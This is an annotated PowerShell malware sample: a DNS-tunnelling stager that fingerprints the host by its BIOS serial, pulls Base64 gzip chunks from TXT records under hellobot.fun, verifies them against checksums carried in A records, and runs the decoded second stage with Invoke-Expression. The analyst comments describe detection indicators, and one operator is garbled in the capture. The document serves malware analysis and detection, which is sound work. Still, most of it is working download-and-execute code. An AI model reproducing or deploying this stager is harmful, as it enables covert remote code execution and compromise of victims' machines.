# Pick-Domain: choose one entry from a list of candidate domains.
#   $DomainList - the candidates (the main section of this script passes @("hellobot.fun")).
#   Returns $DomainList unchanged when its count is 1, otherwise one element
#   selected with Get-Random.
- function Pick-Domain {
- Param($DomainList)
- if ($DomainList.count -eq 1) {
- return $DomainList
- }
- return $DomainList[(Get-Random -Maximum ([array]$DomainList).count)]
- }
# Identify-Machine: derive a per-host label from the BIOS serial number.
#   Reads SerialNumber from Win32_BIOS over WMI, takes the MD5 of its UTF-8 bytes,
#   formats the digest as upper-case hex and returns the first 10 characters.
# Analyst note: the value depends only on the serial, so it is identical on every
# run on a given host. Download-Stage places it as the left-most label of each DNS
# query name, so a responder can recompute it from an asset's BIOS serial to tie
# DNS log entries to a specific machine.
- function Identify-Machine() {
- $serial = Get-WmiObject Win32_BIOS | Select -ExpandProperty SerialNumber
- $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
- $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($serial)) | foreach { $_.ToString("X2") }) -join ""
- return $hash.Substring(0, 10)
- }
# Try-Domains: run $Action against one domain and recurse over the rest on failure.
#   $DomainList - candidate domains; throws "No domains" when the count is 0.
#   $Action     - script block invoked with the picked domain as its argument.
#   Returns whatever $Action returns for the first domain that does not throw.
# Nothing in the visible listing calls this function.
- function Try-Domains {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$DomainList, [Parameter()][scriptblock]$Action)
- if ($DomainList.count -eq 0) {
- Throw "No domains"
- }
- $domain = Pick-Domain($DomainList)
- try {
- return $Action.Invoke($domain)
- } catch {
# NOTE(review): the comparison operator on the next line is garbled in this capture
# (a non-ASCII character where an operator prefix is expected); presumably the
# filter was meant to drop the domain that just failed before recursing.
- return Try-Domains ($DomainList | Where-Object { $_ βne $domain }) $Action
- }
- }
# Do-DNS: resolve one DNS name and return the raw Resolve-DnsName result.
#   $dns  - the name to query.
#   $type - the record type passed to -Type (callers in this listing use A and TXT).
#   Returns the resolver output; on failure prints $Error[0] with Write-Host and
#   returns nothing.
# -DnsOnly makes Resolve-DnsName use the DNS protocol only, so every lookup made
# through this function is visible as an ordinary DNS query in resolver logs.
- function Do-DNS {
- [CmdletBinding()]
- param([Parameter()]$dns, [Parameter()]$type)
- Write-Debug "[DNS] (${type}) ==> ${dns}"
- # DEBUG DEBUG DEBUG
- #Write-Host $type
- try {
# -ErrorAction Stop turns resolver errors into exceptions so the catch below runs.
- $data = Resolve-DnsName -Type $type $dns -ErrorAction Stop -DnsOnly -Debug:$false
- return $data
- } catch {
- Write-Host $Error[0]
- }
- }
# Do-DNS-TXT: query a name through Do-DNS and return the Strings of the answer
# concatenated into one string.
#   $dns  - the name to query.
#   $type - record type forwarded to Do-DNS.
# Nothing in the visible listing calls this function; Download-Stage repeats the
# same expression inline.
- function Do-DNS-TXT {
- [CmdletBinding()]
- param([Parameter()]$dns, [Parameter()]$type)
- return (Do-DNS $dns $type | Select -ExpandProperty Strings) -join ''
- }
# Download-Stage: assemble a text payload from numbered DNS records.
#   $DomainList - candidate domains; one is picked per chunk with Pick-Domain.
#   Returns the concatenation of all accepted TXT chunks as a string.
#
# Query name layout (built on the $dns lines below):
#     <Identify-Machine value>.stage.<chunk index>.<domain>
# For each chunk the function asks for the A record and then the TXT record of the
# same name. The A record carries control data, not an address:
#   * the literal answer 0.0.0.0 ends the loop;
#   * any other answer is compared, as a number, with the first 8 hex characters of
#     the MD5 of the TXT content. On a match the TXT content is appended and the
#     chunk index advances; otherwise the same name is queried again.
#
# Detection notes: in resolver logs this shows up as alternating A and TXT queries
# for names with a fixed 10-hex-character first label, the literal label "stage",
# and an incrementing integer label.
# NOTE(review): when Do-DNS fails it returns nothing, and an empty $dnsResponseA is
# also not equal to '0.0.0.0', so a blocked or sinkholed domain appears to leave the
# loop re-querying the same name indefinitely - confirm in a sandbox before relying
# on this as a detection signal.
- function Download-Stage {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$DomainList)
- $stage = ''
- $domain = Pick-Domain $DomainList
- $partStage = 0
- $dns = "$(Identify-Machine).stage.$partStage.$domain"
- $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
- while ($dnsResponseA -ne '0.0.0.0') {
# A-record value -> integer -> base-2 digit string.
- $bigInt = Ip-To-Long $dnsResponseA
- $bin = To-Bin-Number $bigInt
- $dnsResponseTXT = (Do-DNS $dns TXT | Select -ExpandProperty Strings) -join ''
# MD5 of the TXT content, upper-case hex; only the first 8 characters are used.
- $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
- $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($dnsResponseTXT)) | foreach { $_.ToString("X2") }) -join ""
- $txtHex = [string]$hash[0] + [string]$hash[1] + [string]$hash[2] + [string]$hash[3] + [string]$hash[4] + [string]$hash[5] + [string]$hash[6] + [string]$hash[7]
- $txtInt = Hex-To-Int $txtHex
- $txtBin = To-Bin-Number $txtInt
# The two numbers are compared as base-2 strings; equal means the chunk is accepted.
- if ([string]$bin -eq [string]$txtBin) {
- $stage += $dnsResponseTXT
- $domain = Pick-Domain $DomainList
- $partStage++
- }
# Next name: the following chunk after a match, the same chunk again otherwise.
- $dns = "$(Identify-Machine).stage.$partStage.$domain"
- $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
- }
- return [string]$stage
- }
# Hex-To-Int: convert a hexadecimal string to a [bigint].
#   $Hex - the hex digits; Download-Stage passes 8 characters of an upper-case MD5.
#   Returns the numeric value as [bigint].
# Digits are processed from the last character to the first. The if chain maps the
# letters A-F to 10-15; any other character is converted with [int]. Each digit is
# multiplied by 16 raised to its position using the `power` helper defined in this
# file.
- function Hex-To-Int{
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$Hex)
- $length = "$Hex".Length
- $mainLength = $length
- [bigint]$decimal = 0
- while ($length -ne 0) {
- $length--
- $liter = [string]$Hex[$length]
- if ($liter -eq "A"){
- $liter = 10
- }
- if ($liter -eq "B"){
- $liter = 11
- }
- if ($liter -eq "C"){
- $liter = 12
- }
- if ($liter -eq "D"){
- $liter = 13
- }
- if ($liter -eq "E"){
- $liter = 14
- }
- if ($liter -eq "F"){
- $liter = 15
- }
- $liter = [int]$liter
# $length was already decremented, so the exponent is 0 for the last character.
- $power = power 16 ($mainLength - $length - 1)
- $decimal += [bigint]($liter * $power)
- }
- return $decimal
- }
# power: thin wrapper around [Math]::Pow.
#   $num1 - base, $num2 - exponent.
#   Returns $num1 raised to $num2 as produced by [Math]::Pow.
# Called by Hex-To-Int with base 16.
- function power{
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$num1, [Parameter(ValueFromPipeline)]$num2)
- return [Math]::Pow($num1, $num2)
- }
# To-Bin-Number: build the base-2 digit string of a number.
#   $Number - the value to convert.
#   Returns a string of 0/1 digits, most significant first.
# Download-Stage calls this on both sides of its checksum comparison and compares
# the resulting strings.
- function To-Bin-Number{
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$Number)
- $tmp = ''
# $binNumber_ (trailing underscore) is assigned here but never read; the loop
# accumulates into $binNumber, which has no explicit initial value.
- $binNumber_ = ''
- $myNumber = $Number
- DO {
# Prepend the remainder, then halve; the body runs at least once, so 0 yields "0".
- $tmp = $myNumber % 2
- $binNumber = [string]$tmp + [string]$binNumber
- $myNumber = [bigint]($myNumber / 2)
- } WHILE ($myNumber -ne 0)
- return $binNumber
- }
# Ip-To-Long: convert a dotted-quad string to a single number.
#   $ip - text such as the IPAddress value of an A-record answer.
#   Returns octet0*16777216 + octet1*65536 + octet2*256 + octet3.
# In this script the input is not used as a network address: Download-Stage treats
# the resulting number as a checksum to compare with a hash of the TXT record.
- function Ip-To-Long {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$ip)
- $ipParts = "$ip".Split(".")
- $a = [bigint]([int]$ipParts[0] * 16777216)
- $b = [bigint]([int]$ipParts[1] * 65536)
- $c = [bigint]([int]$ipParts[2] * 256)
# The last octet is left as the string from Split and converted by the addition.
- $d = $ipParts[3]
- $base10IP = $a + $b + $c + $d
- return $base10IP
- }
# Long-To-Ip: format a number as a dotted-quad string, the reverse direction of
# Ip-To-Long.
#   $long - the numeric value.
#   Returns "a.b.c.d", each part being the value divided by 16777216, 65536, 256
#   and 1 respectively, taken modulo 256.
# Nothing in the visible listing calls this function.
- function Long-To-Ip{
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$long)
- $a = [bigint]([bigint]$long / 16777216) % 256
- $b = [bigint]([bigint]$long / 65536) % 256
- $c = [bigint]([bigint]$long / 256) % 256
- $d = [bigint]([bigint]$long) % 256
- return [string]$a + '.' + [string]$b + '.' + [string]$c + '.' + [string]$d
- }
# Decode-String: turn the text assembled by Download-Stage into script source.
#   $Code - Base64 text.
#   Returns the UTF-8 string obtained by Base64-decoding $Code and gunzipping the
#   result with Get-DecompressedByteArray.
# Analyst note: the same two steps (Base64 decode, then gzip decompress) recover the
# next stage from TXT record contents captured in DNS logs or a packet capture,
# provided the chunks are concatenated in index order.
- function Decode-String {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$Code)
- $gzipBytes = [System.Convert]::FromBase64String($Code)
- $codeBytes = Get-DecompressedByteArray($gzipBytes)
- return [system.Text.Encoding]::UTF8.GetString($codeBytes)
- }
- # =============================================================================
# Get-DecompressedByteArray: gzip-decompress a byte array in memory.
#   $byteArray - the compressed bytes; declared Mandatory, with a default that
#                throws "-byteArray is required".
#   Writes the decompressed bytes to the pipeline as [byte[]].
# The work is done entirely with MemoryStream objects; this function does not read
# or write any file.
- function Get-DecompressedByteArray {
- [CmdletBinding()]
- Param (
- [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
- [byte[]] $byteArray = $(Throw("-byteArray is required"))
- )
- Process {
- Write-Verbose "Get-DecompressedByteArray"
# The leading comma passes the byte array as a single constructor argument.
- $input = New-Object System.IO.MemoryStream( , $byteArray )
- $output = New-Object System.IO.MemoryStream
- $gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
- $gzipStream.CopyTo( $output )
- $gzipStream.Close()
- $input.Close()
- [byte[]] $byteOutArray = $output.ToArray()
- Write-Output $byteOutArray
- }
- }
- # =============================================================================
# Main section: fetch a payload over DNS, decode it and execute it in the current
# PowerShell session.
#   1. Download-Stage assembles Base64 text from TXT records under the listed domain.
#   2. Decode-String Base64-decodes and gunzips it to script text.
#   3. Invoke-Expression runs that text.
# Analyst notes:
#   * The only domain configured in this sample is hellobot.fun; DNS queries for
#     names under it are the network indicator visible in this listing.
#   * No code in this listing writes the payload to disk, so file-based scanning of
#     the host is unlikely to see the second stage. PowerShell script block logging
#     (event ID 4104) and DNS query logs are the more useful sources.
#   * Any exception is caught and only printed, so a failed run does not stop the
#     calling process with an error.
- $domains = @("hellobot.fun")
- try {
- $stage = Download-Stage($domains) | Decode-String
- Invoke-Expression $stage
- } catch {
- Write-Debug "[Main] General failure"
- Write-Host $Error[0]
- # do nothing
- }